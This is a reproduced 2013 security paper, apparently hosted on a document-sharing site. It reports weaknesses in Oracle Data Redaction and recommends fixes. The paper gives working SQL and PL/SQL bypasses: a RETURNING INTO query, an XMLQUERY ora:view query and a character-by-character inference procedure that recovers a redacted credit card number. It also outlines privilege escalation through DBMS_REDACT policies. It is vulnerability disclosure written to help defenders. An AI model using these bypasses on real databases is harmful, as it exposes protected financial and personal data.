Oracle Data Redaction is Broken



Similar documents
Exploiting PL/SQL Injection on Oracle 12c. with only. CREATE SESSION privileges

2015 Jože Senegačnik Oracle ACE Director

Oracle PL/SQL Injection

Oracle Database 12c: Introduction to SQL Ed 1.1

SQL Programming. CS145 Lecture Notes #10. Motivation. Oracle PL/SQL. Basics. Example schema:

Fine Grained Auditing In Oracle 10G

NEW AND IMPROVED: HACKING ORACLE FROM WEB. Sumit sid Siddharth 7Safe Limited UK

A Forensic Investigation of PL/SQL Injection Attacks in Oracle 1 st July 2010 David Litchfield

Oracle Database 10g: Introduction to SQL

Virtual Private Database Features in Oracle 10g.

A basic create statement for a simple student table would look like the following.

14 Triggers / Embedded SQL

The Sins of SQL Programming that send the DB to Upgrade Purgatory Abel Macias. 1 Copyright 2011, Oracle and/or its affiliates. All rights reserved.

SQL Injection. SQL Injection. CSCI 4971 Secure Software Principles. Rensselaer Polytechnic Institute. Spring

SQL Injection in web applications

Configuring Data Masking

Database security tutorial. Part I

Automating SQL Injection Exploits

Oracle Database: SQL and PL/SQL Fundamentals NEW

Oracle Database: Introduction to SQL

SQL injection: Not only AND 1=1. The OWASP Foundation. Bernardo Damele A. G. Penetration Tester Portcullis Computer Security Ltd

Advanced SQL Injection in Oracle databases. Esteban Martínez Fayó

Writing Control Structures

Hacking and Protecting Oracle DB. Slavik Markovich CTO, Sentrigo

Oracle Database: Introduction to SQL

Oracle Database: SQL and PL/SQL Fundamentals

Database Programming with PL/SQL: Learning Objectives

Oracle Database 11g SQL

3.GETTING STARTED WITH ORACLE8i

1 Triggers. 2 PL/SQL Triggers

Oracle Database 10g Express

Triggers & Packages. {INSERT [OR] UPDATE [OR] DELETE}: This specifies the DML operation.

ORACLE 9I / 10G / 11G / PL/SQL COURSE CONTENT

Webapps Vulnerability Report

Oracle For Beginners Page : 1

Violating The Corporate Database. Presented by Dan Cornforth Brightstar, IT Security Summit, April 2006

Oracle Database: Introduction to SQL

Oracle 10g PL/SQL Training

Oracle For Beginners Page : 1

Oracle Database: SQL and PL/SQL Fundamentals

Maintaining Stored Procedures in Database Application

Database 10g Edition: All possible 10g features, either bundled or available at additional cost.

SQL Injection for newbie

An Oracle White Paper June RESTful Web Services for the Oracle Database Cloud - Multitenant Edition

Guide to Performance and Tuning: Query Performance and Sampled Selectivity

SQL. Short introduction

1 Stored Procedures in PL/SQL 2 PL/SQL. 2.1 Variables. 2.2 PL/SQL Program Blocks

Darshan Institute of Engineering & Technology PL_SQL

In This Lecture. Security and Integrity. Database Security. DBMS Security Support. Privileges in SQL. Permissions and Privilege.

Oracle SQL. Course Summary. Duration. Objectives

Guide to SQL Programming: SQL:1999 and Oracle Rdb V7.1

T-SQL STANDARD ELEMENTS

Chapter 9, More SQL: Assertions, Views, and Programming Techniques

An Introduction to PL/SQL. Mehdi Azarmi

Oracle(PL/SQL) Training

Thick Client Application Security

Instant SQL Programming

SQL - QUICK GUIDE. Allows users to access data in relational database management systems.

Chapter 9 Java and SQL. Wang Yang wyang@njnet.edu.cn

Oracle Database: SQL and PL/SQL Fundamentals NEW

Handling Exceptions. Copyright 2008, Oracle. All rights reserved.

SQL Databases Course. by Applied Technology Research Center. This course provides training for MySQL, Oracle, SQL Server and PostgreSQL databases.

SQL Injection and Data Mining through Inference

SECURING APACHE : THE BASICS - III

5.1 Database Schema Schema Generation in SQL

Secure Web Application Coding Team Introductory Meeting December 1, :00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda

Best Practices for Oracle Databases Hardening Oracle /

Paul M. Wright Last updated Sunday 25 th February For

White Paper. Blindfolded SQL Injection

Programming with SQL

Penetration Testing: Advanced Oracle Exploitation Page 1

Programming Database lectures for mathema

Web Application Disassembly with ODBC Error Messages By David Litchfield Director of Security

Topics Advanced PL/SQL, Integration with PROIV SuperLayer and use within Glovia

Serious Threat. Targets for Attack. Characterization of Attack. SQL Injection 4/9/2010 COMP On August 17, 2009, the United States Justice

Oracle USF

Duration Vendor Audience 5 Days Oracle End Users, Developers, Technical Consultants and Support Staff

Oracle 11g PL/SQL training

SQL is capable in manipulating relational data SQL is not good for many other tasks

D61830GC30. MySQL for Developers. Summary. Introduction. Prerequisites. At Course completion After completing this course, students will be able to:

Oracle For Beginners Page : 1

MOC 20461C: Querying Microsoft SQL Server. Course Overview

Database Administration with MySQL

How I hacked PacketStorm ( )

Fundamentals of Database Design

Handling Exceptions. Copyright 2006, Oracle. All rights reserved. Oracle Database 10g: PL/SQL Fundamentals 8-1

SQL Simple Queries. Chapter 3.1 V3.0. Napier University Dr Gordon Russell

Oracle Database Security

IT2304: Database Systems 1 (DBS 1)

Course -Oracle 10g SQL (Exam Code IZ0-047) Session number Module Topics 1 Retrieving Data Using the SQL SELECT Statement

How To Create A Table In Sql (Ahem)

Information Systems SQL. Nikolaj Popov

Database Security. The Need for Database Security

AUTOMATIC DETECTION OF VULNERABILITY IN WRAPPED PACKAGES IN ORACLE

IT2305 Database Systems I (Compulsory)

Review your answers, feedback, and question scores below. An asterisk (*) indicates a correct answer.

Managing Objects with Data Dictionary Views. Copyright 2006, Oracle. All rights reserved.

5. CHANGING STRUCTURE AND DATA

Oracle Database 10g: Program with PL/SQL

Transcription:

Oracle Data Redaction is Broken David Litchfield [david.litchfield@datacom.com.au] 8 th November 2013 Copyright Datacom TSS http://www.datacomtss.com.au

Introduction Oracle data redaction is a simple but clever and innovative idea from Oracle. However, at present, there are weaknesses that undermine its effectiveness as a good security mechanism. These weaknesses can be exploited via web based SQL injection attacks and this paper details those weaknesses and provides suggestions on how it can be improved and made more secure. What is Oracle data redaction? Oracle data redaction allows you to redact or mask data returned by a query in order to help protect sensitive data, for example credit card details or social security numbers. Redaction doesn't change the data in anyway, rather just how the data is presented to the user. If a user attempts to query a redacted column all they will get is the redacted version of the data. The data can be fully redacted, partially redacted, redacted using regular expressions or even with random data. Oracle data redaction works by creating a redaction policy on a per column basis using the DBMS_REDACT PL/SQL package. By default only the EXECUTE_CATALOG_ROLE and IMP_FULL_DATABASE roles have the permission to use DBMS_REDACT but in the real world application developers would be given access too in order to protect their data. Before continuing... Before examining the weaknesses in Oracle data redaction, let's set up a sample application. We create a simple table called "REDACTIONTEST" with a credit card column called "CC". We then apply a redaction policy to the "CC" column using DBMS_REDACT so the credit card number is returned as 16 Xs: SQL> create table redactiontest (cc varchar(16), id number); Table created. SQL> insert into redactiontest (cc, id) values ('4111222233334444',1); 1 row created. SQL> commit; Commit complete. SQL> select cc, id from redactiontest; CC ID ---------------- ---------- 4111222233334444 1 SQL> BEGIN 2 SYS.DBMS_REDACT.ADD_POLICY( 3 object_schema => 'C##DAVID', 4 object_name => 'REDACTIONTEST', 5 column_name => 'CC', 6 column_description => '', 7 policy_name => 'redact_cc', 8 policy_description => 'Redacts the cc column', 9 function_type => DBMS_REDACT.REGEXP, 10 regexp_pattern => DBMS_REDACT.RE_PATTERN_ANY_DIGIT, 11 regexp_replace_string => 'X',

12 expression => '1=1'); 13 END; 14 / SQL> select cc from redactiontest; CC ------------------------------------ XXXXXXXXXXXXXXXX As can be seen our credit card number is no longer readable as it is now redacted. Gaining access to redacted data The idea behind Oracle data redaction is to prevent access to sensitive data in specific columns whilst still allowing access to data in other columns for a given table. There are three methods by which an attacker can gain access to redacted data. The first method uses the RETURNING INTO clause with INSERT, UPDATE and DELETE operations. The RETURNING INTO clause allows data to be returned into a variable after a DML operation. This can be used to bypass Oracle data redaction. SQL> SET SERVEROUTPUT ON SQL> DECLARE 2 buffer varchar(30); 3 BEGIN 4 UPDATE redactiontest 5 SET id = id 6 WHERE id = 1 7 RETURNING cc INTO buffer; 8 DBMS_OUTPUT.put_line('CC=' buffer); 9 END; 10 / CC=4111222233334444 SQL> This is simply an oversight on Oracle's part. Whilst they prevent most ways of tricking redaction, for example by using a flashback query or by doing a CREATE TABLE AS SELECT, they simply forgot about RETURNING INTO as a means of gaining access to data. A second method of bypassing data redaction is by using the XMLQUERY() function. The XMLQUERY() function takes an XQuery expression and returns the results. By passing the redacted table name to the ora:view XQuery function a user can return rows from the table and these results are not redacted. SQL> select xmlquery('for $i in ora:view("redactiontest") return $i' returning content) from dual; XMLQUERY('FOR$IINORA:VIEW("REDACTIONTEST")RETURN$I'RETURNINGCONTENT)

--------------------------------------------------------------------------- <ROW><CC>4111222233334444</CC><ID>1</ID></ROW><ROW><CC>3998887776665554</CC ><ID> Again, this is just another oversight on Oracle s part. Another way to gain access to the data is with an iterative inference attack. It is possible to access data in a SELECT's WHERE clause. This gives an attacker the opportunity to essentially guess or brute-force the data in a redacted column using a WHERE data LIKE predicate. Consider the following PL/SQL procedure. This simply tests the value of a given character at a given offset into the string. When it gets the first character correct it moves on to the next character and so on until all 16 characters of the credit card have been ascertained. SQL> set serveroutput on SQL> create or replace procedure p_undoredaction is 2 buf varchar(40); 3 t char; 4 x number; 5 i number; 6 c number; 7 begin 8 i := 0; 9 c := 1; 10 while c < 17 loop 11 select count(*) into x from redactiontest where substr(cc,c,1)=to_char(i); 12 if x > 0 then 13 c := c+1; 14 buf := buf to_char(i); 15 i := 0; 16 else 17 i := i+1; 18 end if; 19 20 end loop; 21 dbms_output.put_line('cc: ' buf); 22 end; 23 / Procedure created. SQL> exec p_undoredaction; CC: 4111222233334444 SQL> This type of iterative inference attack is trivial and could be launched via a web based SQL injection flaw. Escalating privileges using DBMS_REDACT Anyone with the privileges to execute DBMS_REDACT can create redaction policies on any table in any schema except the SYS schema. As such an attacker can execute code as that user by passing a nefarious function in the EXPRESSION clause of DBMS_REDACT. When that owner next queries

the table the attacker's function will execute. An attacker would target users that run background processes where tables are automatically queried such as GSMADMIN_INTERNAL querying the CLOUD table or the APEX user querying the WWV_FLOW_MAIL_QUEUE table. Use as a lateral SQL injection tool Due to the fact that it changes the data returned in a query, an attacker could use a redaction policy to exploit a 2 nd order SQL injection flaw. Assume there is a PL/SQL package that sanitises input going into the application, then retrieves that same data later. Because it has already been sanistised on the way in the developer may assume that there s no need to check it again and trusts the structure of the data before passing into a dynamic SQL query. By applying a policy to such trusted data an attacker could affect a lateral SQL injection attack. Recommendations Oracle data redaction could be strengthened firstly by fixing the DML RETURNING INTO and XMLQUERY() bypasses and also by allowing a policy to determine whether a redacted column can be referenced in a WHERE clause. This would prevent the iterative inference attack. A further improvement by Oracle would be to not allow a user to create policies on tables in another schema unless that user is SYS or SYSTEM or has the appropriate ANY privilege. In the interim, only grant the execute privilege to DBMS_REDACT to those users that require it, and once the redaction policies have been put in place revoke their execute privileges. As it stands, Oracle data redaction is a pretty cool feature but cannot be relied on to protect data.

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information